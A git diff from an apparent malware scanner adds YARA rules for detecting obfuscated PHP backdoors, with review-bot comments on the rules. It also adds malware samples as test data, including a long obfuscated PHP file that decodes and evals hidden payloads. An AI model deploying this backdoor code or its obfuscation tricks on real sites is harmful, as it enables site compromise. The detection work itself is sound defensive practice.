diff --git a/pkg/compile/compile.go b/pkg/compile/compile.go
index d040a76c..66a76b86 100644
--- a/pkg/compile/compile.go
+++ b/pkg/compile/compile.go
@@ -49,7 +49,10 @@ var badRules = map[string]bool{
 var rulesWithWarnings = map[string]bool{
 "opaque_binary": true,
 "hardcoded_ip": true,
+ "str_replace_obfuscation": true,
+ "php_str_replace_obfuscation": true,
 "hardcoded_ip_port": true,
+ "base64_str_replace": true,
 "systemd_no_comments_or_documentation": true,
 "sleep_and_background": true,
 "Microsoft_Excel_with_Macrosheet": true,
diff --git a/pkg/report/report.go b/pkg/report/report.go
index 10f91faf..e1fb99f7 100644
--- a/pkg/report/report.go
+++ b/pkg/report/report.go
@@ -152,6 +152,10 @@ func behaviorRisk(ns string, rule string, tags []string) int {
 }
 }
 
+ if strings.Contains(ns, "php-malware-finder") {
+ risk = 3
+ }
+
 if strings.Contains(ns, "keyword") || strings.Contains(rule, "keyword") {
 risk = 2
 }
diff --git a/rules/combo/backdoor/php.yara b/rules/combo/backdoor/php.yara
index c2fb9e01..5815eaaf 100644
--- a/rules/combo/backdoor/php.yara
+++ b/rules/combo/backdoor/php.yara
@@ -248,3 +248,23 @@ rule php_base64_encoded : critical {
 condition:
 any of them
 }
+
+rule php_str_replace_obfuscation : critical {
+ meta:
+ description = "accepts input and runs obfuscated code"
+ strings:
+ $f_str_replace = "str_replace"
+ $f_display_errors = "display_errors"
+ $f_output_buffering = "output_buffering"
+
+ $i_get = "$_GET["
+ $i_post = "$_POST["
+ $i_cookie = "$_COOKIE["
+
+ $o_dynamic_single = /\$\w {0,2}= \$\w\(/
+ $o_single_concat = /\$\w . \$\w . \$\w ./
+ $o_single_set = /\$\w = \w\(\)\;/
+ $o_recursive_single = /\$\w\( {0,2}\$\w\(/
+ condition:
+ filesize < 65535 and 2 of ($f*) and any of ($i*) and 2 of ($o*)
+}
diff --git a/rules/evasion/base64-decode.yara b/rules/evasion/base64-decode.yara
index b43240be..fe0f7534 100644
--- a/rules/evasion/base64-decode.yara
+++ b/rules/evasion/base64-decode.yara
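Review bot: The three entries added to rulesWithWarnings say nothing about which YARA compiler warning each rule triggers, so a later reader cannot tell when an entry may be dropped again; the map's existing entries share that gap, but the new ones are the place to start. A trailing comment per entry would do, e.g. `"base64_str_replace": true, // TODO(review): record the warning this rule emits`. The map literal begins and ends outside the hunk.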
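Review bot: The new `risk = 3` for namespaces containing "php-malware-finder" is assigned before the existing keyword check, which unconditionally lowers risk to 2 whenever ns or rule contains "keyword", so a php-malware-finder rule whose name includes that word ends up at 2 rather than 3. If the namespace is meant to win, move the new block after the keyword check, or guard that branch with `if !strings.Contains(ns, "php-malware-finder") && (strings.Contains(ns, "keyword") || strings.Contains(rule, "keyword")) {`. Any assignment later in behaviorRisk can presumably still overwrite it too; the function's start and end lie outside the hunk.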
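Review bot: In `$o_single_concat = /\$\w . \$\w . \$\w ./` the three dots are unescaped, so each matches any single character rather than the PHP `.` concatenation operator the surrounding patterns suggest; the string then also matches a one-letter variable followed by any character in those positions, which widens the match well beyond the obfuscation shape being targeted. If concatenation is intended, escape them: `$o_single_concat = /\$\w \. \$\w \. \$\w \./`. The same four `$o_*` patterns are duplicated verbatim in str_replace_obfuscation in rules/evasion/script-obfuscation.yara later on this page, which needs the same fix; keeping both copies in sync by hand is itself a maintenance risk worth a comment in each.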
@@ -12,6 +12,17 @@ rule base64_decode : medium python {
 any of them
 }
 
+
+rule py_base64_decode : medium php {
+ meta:
+ description = "decode base64 strings"
+ strings:
+ $b64decode = "base64_decode"
+ condition:
+ any of them
+}
+
+
 rule urlsafe_decode64 : medium ruby {
 meta:
 description = "decode base64 strings"
diff --git a/rules/evasion/base64-hidden.yara b/rules/evasion/base64-hidden.yara
new file mode 100644
index 00000000..7dd38d55
--- /dev/null
+++ b/rules/evasion/base64-hidden.yara
@@ -0,0 +1,10 @@
+rule base64_str_replace : critical {
+ meta:
+ description = "creatively hidden forms of the term 'base64'"
+ strings:
+ $a = /\wba\ws\we64/
+ $b = /\wb\wa\ws\we\w6\w4/
+ $c = /\wb\wa\wse\w6\w4/
+ condition:
+ any of them
+}
\ No newline at end of file
diff --git a/rules/evasion/php_no_time_limit.yara b/rules/evasion/php_no_time_limit.yara
new file mode 100644
index 00000000..438c5045
--- /dev/null
+++ b/rules/evasion/php_no_time_limit.yara
@@ -0,0 +1,8 @@
+rule php_no_time_limit : medium {
+ meta:
+ description = "disables execution time limit"
+ strings:
+ $ref = "set_time_limit(0)"
+ condition:
+ $ref
+}
diff --git a/rules/evasion/script-obfuscation.yara b/rules/evasion/script-obfuscation.yara
index a4a2a983..adf22e14 100644
--- a/rules/evasion/script-obfuscation.yara
+++ b/rules/evasion/script-obfuscation.yara
@@ -54,3 +54,16 @@ rule powershell_encoded : high windows {
 condition:
 filesize < 16777216 and any of them
 }
+
+rule str_replace_obfuscation : high {
+ meta:
+ description = "calls str_replace and uses obfuscated functions"
+ strings:
+ $str_replace = "str_replace"
+ $o_dynamic_single = /\$\w {0,2}= \$\w\(/
+ $o_single_concat = /\$\w . \$\w . \$\w ./
+ $o_single_set = /\$\w = \w\(\)\;/
+ $o_recursive_single = /\$\w\( {0,2}\$\w\(/
+ condition:
+ filesize < 65535 and $str_replace and 2 of ($o*)
+}
diff --git a/rules/exec/shell_command.yara b/rules/exec/shell_command.yara
index 7e3c196d..f6ee9ef7 100644
--- a/rules/exec/shell_command.yara
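Review bot: The new rule is named `py_base64_decode` yet carries the `php` tag and matches PHP's `base64_decode`, so its name contradicts both its tag and the sibling naming in this file (`base64_decode : medium python` above it, `urlsafe_decode64 : medium ruby` below); rename it `rule php_base64_decode : medium php {`. The two blank lines added after its closing brace also break the single-blank spacing the neighbouring rules use.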
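Review bot: The rule name `base64_str_replace` does not describe what the rule matches: nothing in it refers to str_replace, and its three patterns look for the letters of "base64" with a word character interleaved, as the description says. A name such as `rule base64_interleaved_term : critical {` would match the description; if it is renamed, the `base64_str_replace` entry added to rulesWithWarnings in pkg/compile/compile.go on this page has to change with it. With only one short unanchored regex needed to fire and no filesize bound or second required string, a `critical` rating rests on a thin match, so the intended examples are worth recording in `meta` so the patterns can be checked against them later. The file also lacks a trailing newline.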
+++ b/rules/exec/shell_command.yara
@@ -1,4 +1,3 @@
-
 rule system : medium {
 meta:
 description = "execute a shell command"
@@ -12,3 +11,13 @@ rule system : medium {
 condition:
 all of them in (1200..3000)
 }
+
+rule php_shell_exec : high {
+ meta:
+ description = "execute a shell command"
+ syscalls = "fork,execl"
+ strings:
+ $ref = /shell_exec[\(\$\w\)]{0,16}/
+ condition:
+ $ref
+}
diff --git a/rules/techniques/code_eval.yara b/rules/techniques/code_eval.yara
index e045e054..71e190fa 100644
--- a/rules/techniques/code_eval.yara
+++ b/rules/techniques/code_eval.yara
@@ -37,3 +37,13 @@ rule shell_eval : medium {
 condition:
 $val and none of ($not*)
 }
+
+rule php_create_function_no_args : high {
+ meta:
+ description = "dynamically creates PHP functions without arguments"
+ strings:
+ $val = /create_function\([\'\"]{2},\$/
+ condition:
+ any of them
+}
+
diff --git a/samples/PHP/2019.StackOverflow/README b/samples/PHP/2019.StackOverflow/README
new file mode 100644
index 00000000..dbc5054d
--- /dev/null
+++ b/samples/PHP/2019.StackOverflow/README
@@ -0,0 +1 @@
+https://stackoverflow.com/questions/57783589/is-that-some-kind-of-php-backdoor
diff --git a/samples/PHP/2019.StackOverflow/smileyface.php b/samples/PHP/2019.StackOverflow/smileyface.php
new file mode 100644
index 00000000..8df688a1
--- /dev/null
+++ b/samples/PHP/2019.StackOverflow/smileyface.php
@@ -0,0 +1,3 @@
+").($_^"/");?>
+
diff --git a/samples/PHP/2024.Inull-Studio/err.php b/samples/PHP/2024.Inull-Studio/err.php
new file mode 100644
index 00000000..e7d62535
--- /dev/null
+++ b/samples/PHP/2024.Inull-Studio/err.php
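Review bot: In `$ref = /shell_exec[\(\$\w\)]{0,16}/` the character class is quantified `{0,16}`, so it is optional and the regex accepts exactly the inputs the plain string `"shell_exec"` accepts — the suffix only lengthens a match, it never constrains one. The rule therefore fires at `high` on any mention of the name, including a `disable_functions` list or a comment, while paying regex cost for no extra selectivity. If a call is what is meant, require the parenthesis, e.g. `$ref = /shell_exec\s{0,2}\(/`; if the bare name is the intent, a plain string is cheaper and says so.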
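Review bot: `$val = /create_function\([\'\"]{2},\$/` allows no whitespace after the comma, so the common spacing `create_function('', $code)` is missed, and `[\'\"]{2}` also accepts the mismatched pair `'"`, which is not valid PHP. Something like `$val = /create_function\(\s{0,2}(''|""),\s{0,2}\$/` keeps the "no arguments, variable body" shape while tolerating spaces. The extra blank line added at the end of the file is a style nit.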
@@ -0,0 +1,25 @@ +100){$ٗ();}eval($ִ('D0AEشG49Ʀ/G+H֬AF1CβGAĢؚ0AHEȴADB='));!$ȑ($̻Ř($($പƆ,$ݯ('1'),$ё('1='))),$($($പƆ,$̯툤('=='),$Ӌܼ('1'))))?$뼘():$ȱѵ;$=$('1CF');$ͯݚ=$ӫۆ('1');$ͯݚ=$(@$ۭ($ٚ($($പƆ,$,$ͯݚ))));return$ͯݚ;}function ($,$Ӆ朋=''){$˯='base64_decode';$=$˯('bWQ1');$̵Ѫ=$('');$Íշ=$˯('b3Jk');$Һ=$˯('c3RybGVu');$=$˯('Y2hy');$Ӆ朋=!$Ӆ朋?$Íշ(''):$Ӆ朋;$鞘=$;for(;$鞘<$Һ($);$鞘++)$ﱍ.=$Íշ(${$鞘})<$Íշ('')?(($Íշ(${$鞘})>$Ӆ朋&&$Íշ(${$鞘})<$Íշ(''))?$($Íշ(${$鞘})/2):${$鞘}):'';$ͯݚ=$˯($ﱍ);$鞘=$;$Íշ=$Υ=$Һ($̵Ѫ);for(;$鞘<$Һ($ͯݚ);$鞘++){$Íշ=$Íշ?$Íշ:$Υ;$Íշ--;$.=$ͯݚ[$鞘]^$̵Ѫ[$Íշ];}return$;}}}global$Ť,$,$,$߲,$ʨ,$ƺѐܼ,$ߤ뿛,$ȸ,$㝴,$¢,$ۭ,$Ăټ,$ȑ,$ٕ׃,$,$,$䵆,$;$ʐ=$͝ƶ=$=$=$ҷ댭ϲ=$=$܆؇=$ǭDZ=$ʫ=$Ҟ=$Ԙ͢=$کȞ=$=$׵Ȉ=$̥=$Ÿ=$ܔЄ=$Ǜ=$='¾';if(!$Ť){$ʐ($Ť,8);$͝ƶ($,9);$($ߤ뿛,10);$($ۭ,4);$ҷ댭ϲ($Ăټ,13);$($ȑ,12);$܆؇($ٕ׃,2);$ǭDZ($,14);$ʫ($,15);$Ҟ($䵆,16);$Ԙ͢($,17);$کȞ($㝴,18);$($¢,19);$׵Ȉ($ȸ,11);$̥($ƺѐܼ,5);$Ÿ($߲,6);$ܔЄ($,1);$Ǜ($Ƀ,3);$($ʨ,7);}$ִ=$ݯ=$ё=$ǤԺ='';$𚹠=$ִ('8');$ͯݚ=($$𚹠);$䵆($($$𚹠));$ә=$¢($ͯݚ);eval($ִ('ACBGA0ȪΪ9ȢؚEGGFΞ='));$=$;$䵆($($$𚹠));return$;?>HҞ8겞+C⨜8E69DE8갤7D1H8B66E̞5ܮ̖C+DG3Ԣ/C1̘ޘ3ڮJ2EDF29EDԖBIĦʢB38FAI10C5AJE+D89G/A3Fް/EAGACBJE+J17̜ܲʦ591֤4/5/DI552/D6/HHFF8GG7Ш9谖BF1+47G2H+211F95BFA9FG6Ĵ91007420+/؜HGƨF8ΰ2FD795348GB+괲7GAܘ7E5ڬCҴ18370D3B1DA9H6H7ڮDJ4094CJ508CHDJ+3䢜9ज127ڴ/G8F3DJ4G®A5FIҠ̤/آJIIJ¤15246+2貮䚨1ĘФ64AHD̰4G/I+☦J0E̤73FJ9A8̞ꞲII6ڠ+ڜ5DD7CGИHƲ4533Ԗ6/Ҙ–H0CƖF2G7䦮8GF8223G28H06GJ434G24ޞ5خ/DJAC+EΤE좰ꬤAD6J89G34A8Jܠ6633IB/Iœڪ֖DJ4ږH얲8Ȝ07IA0+GIFH⤤J+1/FEΨʮ0F70ĖFʲB+Ʋ1/1ƪD7GID7ʰH3H6F8H09̢֪C9вHĢAE1謚ܲAI71ҖAȲаڮҪ+ܴ8231E4ޠ֞7H4F/63ȬШ11JBBڪA̞άJE87A2I0+آ8Ԝ7Ҩ/C/Ě1A֨904H8/2IG01ҢЖFF8D3FΘ2199I139 
GF+GGҨE+I̚6I/5258/G/GFG7GHJ4C5ڰC4A9AJ1ؠ0薚ذEB6032֖42ʰCAG726FD0J3Բ֮JDƘ2̦EڮJ̬8B+ږ+I3Cޢ08E50CAHI447¦7J873/ؠ6A/I/J2J4EԪFI76ID/G/²61Aخ6C/IʞG֬МH7405GCԞЮ1BЬ°F85ОA772Ҧ376̲HH6C5I4/֞9C1ACAHFڨA+H̨IEGEBI67I/+70ƨ0J6JFE592GGG33D/CAJ6/Ҵ̜393˜+H584GGAII/Jެ1ުĪ55I60Ԗ5A19B6943ʚD̘8+®6FBA9쨴73ڮڴDҘ8J0CA+09FC4֖0ܴFA74Κ06FԪ1AΞFΨΤ䠞HJB94G9ȢBަ֢A+JBĦ잖BҨ205F3ΰC5ܦ/4D5Jް965E1CD/503223A6ĮEМ906A4/H7/+Ԭ+00ܪBEGB6B57讪ަ6242EBBB2/ΜD5961Cښ66EAEږ1963G1/EGF/DH2GԨҰ2575J4+4Ϊ7ʴ97H9+ڰCʢ/1EHF39C93DAޜ3IB9J66A4CECF0B05JG5IΦ8Gΰ1/I4F3BJ8283C50ȚڤH33I8CҨ456H32D0II72627EBʚΜAژJ֠I09ҰIIAF410C1G+1F䠞3ܖA+ڠ8ԠF31J6BI6A8ƞ訪5ԦJΘG6AȠ6̰ܴ6JHΤ00+4EI8194G078/Ȧ8D2BJ5729ܦ/8CΞG4AC645//+5B349̢ОD196+Ԛ1ֲ3Ģȴ44CG/1FF4F֦2EAG40GD01ʢB96IHަ50FJ6Ě6IJ2̢F++0HʪGA+A/ڦDC9AʲܦGF7ت¢GD721GE2ꪬHJDD598+3GFު890G70+J864317A862JEG27ژDAFB0̢G3H0BI++B/+C882B4H21005F6AAHCJ1E5ޮ/I2G2ĘH̠⮞JЮڴJҠBаܪBژ2޲+EJJEҖCښJEGĬ9䞞BJ80Hʮ2ĞڠIJ43H+AĜ5BئJAֲ̰65֞C52JȨC4ޢښAG4CFԘȦAD6̦G6JB/5H0E0ʲD¬/I396I1ԨFE5DB3BJ/7+66ʦ42JDG3C115HG5A75ܮ55ԲJ+ְJDʲJA7HH2402¦РBJ֪ЖH9I2AAD0JDJGCHAF1I58ƤE4/ADAެ19аȖ3G5ܴ/4޲9DH76֤9DJC558GE/4/392J3ʲGĤ AJΨ23BJBD+523CIB3 EJتA0Ԟ1I9E5CF5JʪAȲ8ܮF8̲A5I9ʮ6⤨IئHDJ4727JF765FĮ158G0FܤƦE2401/B+3ĦA6DҞH48И373GGGFڠCJƘ756Θ26D77/++ڪڮа5/5/2820/I°ʠ/J78GꦞԞ5/I̮4CE4BEA42ԜJCI؞20Į3CEК++90ĪFJ3++6HĞ+CD5+G/̞A´7ƦHؖԘ䖲B9267F֪6̜ȴD褪447A5꠨1вHFG8B9B6E026+83GE53210ڦI00ʚGHDE֤4ȪC6260HEGJȲ5GAE0HG+0B֜ȮD58Ȧ95ڰ69BҰ8D5ޖD7аܨDI+A+I//ڜΪ7BB0I30/78I18FG/D2329I1ܬ/ژ5+12+ܨ5J076C2+0+E2DD/B9/EBJ30Bު150BšIB9EFDF+I+FE29I5δBEH+J/106DDIܚ8Jޞ7ԬĬҲ39EFFBIC7A5B8/EޘBHIG73DJ19ڤ3875/Ė3B+0ήJG1ޠFB/0E+4HԖG509/7GܴG8G5ҚH0/+/GʬEڰ264G82B+40ЪĨAܴ045F/ B36CG1֚9GD32/4735JֲB08ذ4ޘA6/IЖ؜+35C4Fர3+Ԥ+/HҮ1ƞ97B/̰0ֲ0ܞ1겘F8GBFC´40A9J5ĠIDF5⮞GFDHGAܤBCܠ⨠DDA472䦘̴AJCܞ8аB2I̮IA17F5ؚG+H9/J֘7F7FE9041A֪73BB++E 
23H9/H֢9I8Ҫ9F3/4I+GF0ΘȲ069¢I4//+3HJA8H10013̜CA47İƠG20ȮFڦ042CB3J/854ްJ̴I0ؚԜ9CAH2GI52F616H2̠8EΪ0G6I934I+57޴9ʮFBGCҘ3DG4ܦʚ4D317/7307آGEܪFޚD10+4ԴBI96CΤA57Dڠ0䘨JB7E01II6JE0I09CA061+2CFGIG+Т0AD8+CEJCڮ19BB7֮GG4BF2C+B1119EH̦G3ޤ+3Ԧ+GڢĚƤ+ܢ5ښDGBGFB+ĢC6F+22FFEȖF2Ш+Ъ31F4̖δC3B2/8ز9ش86AEDذB4GJΦ8ؠ3AH614̦Ȟ5/Ҧ9I쪲0A30J99EަެD8HI86F816AԨȜԤ0Ԧ洰9+J90ꞮB椲5F5Ħ樬035F+79D1AH7Bڴ1GG7G–9I/G4JB´7480J+J3BIFI46D7H36Ж50+ꪠ70/+0J8DªF4ΚCEެ657J/AH4H+/6AFά71EE5AJ1A/B64IB05I06J6806잤6𢲬ABDFGCCGICԲ7GJ6150491+6Dب3DHFJ78ΤܴF48ФҜ/Ҳ6ܞ9H30J676BH5C+BH176B8ƜFI114ȘH8G3ܤFJE8ڤܪ71A/E90AD80B88욬3B9H5868ADIC+ش9I9AE2/E2 0IО̪Ȗ0̠+54즰2HئCȢ2ꮠAޞƖ13ȲDDFDE3EG¢ΰœ29BJFAA58711/1꠴EEBږڤI7/Ү2J4EG3G18沤904B6FH41F35+ܦA8H5HEBJ+0Jިꮘ5CԴ⢤17HHCH0ޢ464B22A/4F03ܢ8/0䚪3949/Dܰ4965ȜA+1ƞ6//ԦֲFJEADG4ԲH2C7DDI5GCž+/019G313537GGҠ01EEȪ2D̤D73+I9Р6189H549/0833I/Ę32DڲHH2IJ+B3706H9D86+¢B/2G1C6+F0IBGA0FAI/GB̠ƠF34ʦIA4DH/DE34޲7ڢEG3H0/55G97451EBBAڞ0IJI8IH6/EBB51A9J6Ȣ1534085421BFBA8Aަ6G2ޮƜE23HF91Ȣ5+DEI9Gʤ9/480FCEƜȚ5AJE/ҠCȦ8쨚FCFABJCJFG+9J6EG9H3+F/323DI240ȠԮ49°1JAڲ1CH0A52HA17202पBޜĚ 9A74FC5ޠFFԖ5GA֜/AܜF1/+5ڜ80⮬57IHGDJBC+3E+ڲHBI59Dꮨ1Dޜ6F+8EA̲86C7G誢GB225/7DE23֮I/FHB̦ƴ蜤1آ6ЖBΪ1F謚G+II6HHDDBDFJƴH֮E8枬H+J55BADEޖ2C/0ԪECHH41F/̢J35ޤ8زʠ86GG7J4ԮܚA83Ģ6HE8ڴʪH9G07D37HԦAĜܚ5Ȧ5371Ġ80F66++E1B/59ܦGΰAAGEDA47H39A8BޞHؘĚBG71/I̬М6GFFFBԨ069HCA8CȲG7֜65ʤʘ2127H6ƪH3CAܲJ58HƮI8+ʚ134I6I¦FܮF4IHFִš2/+/C쨬FDĦAH35F/4++DޖޘJ9H8A2FJJHԢ̖H03ĖHCI69E62ʨ1+2BI4CΚ9CЪ9ʦ8Ҭ8D516I//25EI94/DF+II09E9AB+06J9H32֘7C36ADCȢCG6E23432HF+E5042D4/57Ҫ13ʴF1/A1AA370/65/6024ڴ36JI4+잨3+شCԞE125DB9A7IBܞF9I5169/I37갤CʢFEA¤JJF2آ9419G02/ޞޚAުJ9œ7Ъ/ؖ84G8FF7C99G01Dږ蘖7ОIC059İ86B0I97H+09FI44䘲13FA/8H7ABȮ4IIJΰD8IȬ09DCIF+JDFD122CIF0Cؖ5EDADH83/59JI䰘BJ+Ԧ3J¦EIΨ544ƨ05E2A4I5+Ξ303ƢF8+2ʘ99/7I314AI7F7CĤ줠4+G1A+9BJ9޴DF30¤A76DDڠ6/E22J+G0ƴ8A7/0I5FIGDF748C21B3ʨG871IHF6+9H+5717C701԰6G̖88+5IDޞژBFF0FHA9H0+400I+Cİ֘EԞ900/7J2G00AآEGEGH25+3793CGE2¨9+ޚJܜ7CD̬88/+54E1ICޞ122GƘ欰֬Cʖ0/58Fʲ+08˜G462I9+CDDHΤ4+JޜȬ48J9I0ܬB2̮GJ7F/431JH+8Bβ+H6螨/F02I20ް2I/055G1¤I7CޠΜJAHGМ8JH6/6F0¤0B2I6JĖFJ6ΚH594599846/+JI74BC864CB2C6Ң6I/3+J10+HJIBCDE66+61ʬJIJ֢CGAAG64D7GG13ښB7Ξ//D/ȴB2+ƦJޘ8C5Ĩ42EBF/FʨE
FCमD/1/1I+Gʚ20/+1/ڠ7֢CI8JHHHJ0H0Դ/E061B3ȪEGش4DB91/ĘD5D7AҞB1E1GGHFCH+EB8F4ڬ33Gְޚ8Fئ1ȜƨDJ156F4EGԲ19ئઢB/DƴABH4GĞ65C䠮Iޤ3AE좞/46FB43Ү93FƞB²88B/060ਞҰ3AG5B01H8B8F4֤Jʪ451IJδ8594H0C6J42̜䠞H24EJ+2A+5䬠+78/蜠Ĝ8EAI/1𪘬Jޜ5DH7E36+2IHF̢43IA4/HE8BʚHEԦ¢ԬA3BCFE֠زآ9Ƥ3FGBCC8DC6DH4F؜79CD5HԘ0D8HI93ⴠBB1B3/14FಘDIIҢĢBJFЪE46C8G24GĘ4ʰGBB0II5A0䘪Ƥ5724ԮE4ڬԚ20DG9A5Ę6B64Ψ4G/JBE7B1059F++G9C1B69BBDBC2FADܴƲA/2B/6ܦ6DCI3FIʠ8B893A06A+/E35̤4вԞ/60A1120BH799J¦Ь7JEGEB7I38CA7GG3CĨ6HڞGJ5+9DAB/264Jʖ젪9B4/G7FA2Ъ2B48+ܜBB45E94A3C5CGAI16C8ܢ67+EF625Fب5AG/3/0FĤ373+GJ37G93C/2/8I72C6FJ86֬ȞEޜޜ34JD1+ʘƮH69398Jꚢؠ̰9B76䬲䨲δĜ3AĬ2/A6E058֪B5I48ܢAC9H+5Ԥ+DBڞBJ7FG492E6IB93+İIJHAܜH82CĢ4Ϊ51ȤGҬA4442HA5薞675H樦4EԠ+C117Ī5BBH6Cڮ1GEH6G4Ȥ梬4Ԯ8C֨HJDAڨΘ֘358BEBF+0⢠+̦FHCHEICF96Bؖ97/7CE+3/56G3Ξ427C8/6D1725М5IDEDC97BG1FC7Ҧ5AD6F427򜦘ƠGʮ9+9IAJ+1BG֨G7Jڢ7553+3B2DHGȘEA60B419β7CڲژH2HG+B21Bڨ02C1G2B+/D9ڠ4G9Ȟ9Ơ´¬4Iְ֤BI1Ү1GEƘFƪ4I/B6G䚘06H+EA/6¤HA4֜FĘ1AȢAI09JE4Gܬ8GJ3/9Iآ°HI/G10G4+9AB/56ڮ392A5E0Hܚ77̢6AH7FC0ΚD72Ԯ7EHʮĦĖIIDB/ʚ5/3F786IB3+EΚ/HJު723ؘ5J+A90F00EB/0޴0J77DF3Ȗ0ȴ3D43B/C/H/3HE8Ḛ3E⢢HĢH7ТJ69/H9D9FH18FH6/֜684B5FDJH/10B05ܨAδABœ90I/A9H6D4AI5FȪGޞ+0ꦞ5زܦ4ܤ9A6J75꬚̦CIJJ5E7/+栖HКʦFB63106H/Ħ91DH4H0J讨F̬DFF̨D40G̴72¤/02Fά3̬CF+1GC1EĢ66053J557Ĵ̲D3GCH95ОڜGޚEGC+I3332E갞FABD3J2FIдGG/8CI7̖II26+5ά4C4Fڬ8H4F76AܰḪ0897ܘ5EȘIJ7JF+2H+18/4DA77GCʚJ4ICަ8CDIE/I֦Eޚ̴DEAڬ7DࢠB4AE5DEJ06A93DH4ЬH֦GΚ54/İFژG0/125GBDEЬ770Aޚ΢C8H+М5GЬ0FGCAC/29첤؜H/2F2ȴഠ/GƲ0/5/0֢8E00FD047+2GC/Fв̚F38DJܰG+D3+GI187/BCꜘEDCI++8JȰ88CƲ8D褚HG496JΤFҚ/즨D277F836FڞC8آ6ADޮ1E9Ʈ4C˜찖G68/01ʴڪCAG272œ9C974J1ICDE38DF1ΜIE6+D311괞I9I6A9055Fܞ2/C03☰/+Aު7DEžH/091JΘGC2EJ/8C0βH0AF3樞IڢJHHB4HG6AҰG5H795ʬ0̘054H8F8ΰ0ΰ+DGΤ+1B¨72J¨1/+B̲09GF936F27BIҞIG+D7ҰBʴ64HBHڜI֮C̲A056ư촦87Ξޚ̦CCB53DΰI8F7DЪ̜F/2248젦38D00IJ31H59A898AJ5/B/9JD276E/GC2/3871H1DCC+/9J1/G4DE2О9D+1+060HG/ܠ²B+Ƭ33J6J898ԢJ19ܰ1EBFJD7C76H0ADD92Ҥ1/D0140ܚ/5Ɩܬ2+Ģ/DA31EBĢJܴ˜+9/31EEDEƠ䢬A0CAƴ4ʘG146ܪ979FG4A41𖰠39B5ް9F4+DAF+ȴ0Hœ̖ܨH7E8Ԟޜ2ԚԖ9/+F/3˜2JA7FCEΨ96Ș082G/3DEBC/DB1I謚64763DCG0E3D8HƬCG62EI9HЪ89/3DG54ڨB̠D28/G9ƦCIآ30CC87H2ڪ6FBJB4A4CEHʘ1/A6JB֨2GIJ954ڲFКܪ4ОC0/7ެ5J+0Cؚബ/EΠ7CIIF1E20ؖ6ꦨHIB62+I37Ƙ0GGΰJ1Cʠ5ʬ+5D76J93CD8D/H
ְ2HHF3I5԰G5A77E86H736ҚEE/5+59DJΞE1ª֞BD8B5IGȴBAE5ڮ22C+ʞJBШBBAC9줴AA1D1I0F2F//+AG1Ҟܜ⤬12AȮE510AF6JH43/FJ739ҜC35A+FF1I//AF/38I7G96HC5Ҭ+/39EGJG760DAޮƲBJE08E+ꜚ6/12H5BܴA6F60HޢHGв0̢2Ɩ9EG2JΤHB1ƚ+A3+/GBI/7+G1I8HCIF86A̠2H05+EҖEA5H/IC8ڤ/֮A991JD5ܪԨ4Gİ453/1B5JƨƖ0ޤFB0ȬE4E򚴲6ȜJGDI3E11¤2HEG֚3JIEF5BB4H/+2ܰ2EG6A3146F2J+3C82/تDC39171IHG9֠2G֪06GA+1J9J49ܢ栨+Gڰ̖9G´EDA7A7΢BAE0IJAEC96šI¢Ș+8JH7+6A6/BȰ603HJ16/2A1FAƜ7A˜+302AFG2D5C3E9G2ĘBEI+Ю+H00H8I3𘖰2G5B/Jڴ750Hֲΰ+О21®C̠+Ȭꚴ6+䲞69ؠBHH60جJڜ2FFE֘71讘0Θƪ6F8F/Bް07G1찰CHGܖҮJF֦063GE5FDڴ8DFIDDF5II5C3C86E5ªGB6066JA4¦JƤHКF7ڤ2HH94+30+E4IȨG2FBĞCB3+J԰9A4EH6ڢIؤFH6228EC1Iܴ8EC8ΦIĮ516Ȫ13041GB3HޖBI+47Ȗ/I2Ԗ9BD8B661I/ܮ/B8Cޖ䬬F14JHCF323CJʤҢI2¬BޠH1DHGD58ڢΦI35/Ҫ8ޖECC2/+𦜰ID̘ڦ24A4475HB075BG4I265BHC3Ĭ+462ʪ1A6IF0̢I8H8EDB980BABڮ71JȖ48AFA2H49̖9EFJ7J/G̞7+BHE080▴72DDʜ8F5FA8070Ȱƴ827GԬ0+EڠJ9Bܘ7¢9IEE32GD072ά65D1GEA0753IE133¨30132397ʬEFE9DCE19C8¬HJʪ֠4918BE0D7FJ70HE5ږG++ƚ547B0JFتCEƜ6B/14ưA/GΨIFDA7G5//38BEHH8C1AҲ02JJ6E469H6762D6̨+FE2F63EJDĞ6FAFGJ71/GEҢEGHEDHž8ABа51JB+ʖ95A䖴CGG+ڰИJШҤJҲI3E+8BB+E2ޞBJBDĞI4+ΜHآ7+68̞䞠𚲢0D5509702ΰ1FJB7525G7I76ܖ4ƞ7581/7FEC9DC9¨B8/J/57F0ƪ05AD蘢1A/92ά8147F31+B83ئ88ƤDIޚC89E9Eڦ//HIƨ̚ʠD8JޞƦ5BB2IH12J0+7/0IAC2+A2+F+1ְ1JDΚH4ܠD8723J1+DР+A䴠ʤ31J391166̢05A讨EAC616ޞ584J8FBH+E325F0޴CH504/EԬ7ִΪG3830CJGBDΪ5̘+7İB+ʜ0ܪ/BA0H649B94Р1D1D0FD2Jڴ3AG4HJJ4¢ꢮ479HHD21GGGΦC7+JD1ʮA˜93ΪĖ6H̰EBAHAA7̮9ԤGԦ1BآE¦GGJHD7ޜȠEGI1+DE/92207E17F5̠JJDB161IIA621069/ʘHII81B+D3̬ژ5AEƞ904EIήJJ1BI77ƨ5ޞȘF5¨+94/4촜I6/֮I+F3J7DB貘+ژ¤66H/02/JF/ؚ80ؤC/0B3EܢAJF1DֲFĜ+6J֢G86ޚ7HIJЮ957+A+42/E16/ECĴFDGJ9EIH֠J9CIG6𴘤BAEH6ްI2CJ22EJƪؤ92+1Fʰ7/3F2FAFHHG295409+̴0ID7+Қ+Ԥ/3D䪘ʬEC7DEB++A+Ȧ3ږHžFC3DJΠBFFB00F9793I1D0ޤ9HJ9BH7GACBެܚ̖41GHFCH4A3βFAJ7ޖHF0Hخ10F4BHIG/CGA5®I+82EDB3283➚ޞI3GEJIE0982H50D6GFF996J7+92G30FEΞF2J2IB6IBެF̘GB5474C䠬AҘ96+I3IFCC̚05HFA79B3+԰7C1Eڠ؜G/ުЖ8ȘHҨ092جРE33DдJB5΢E0831EA1F3+֦9JFFڮ19A 
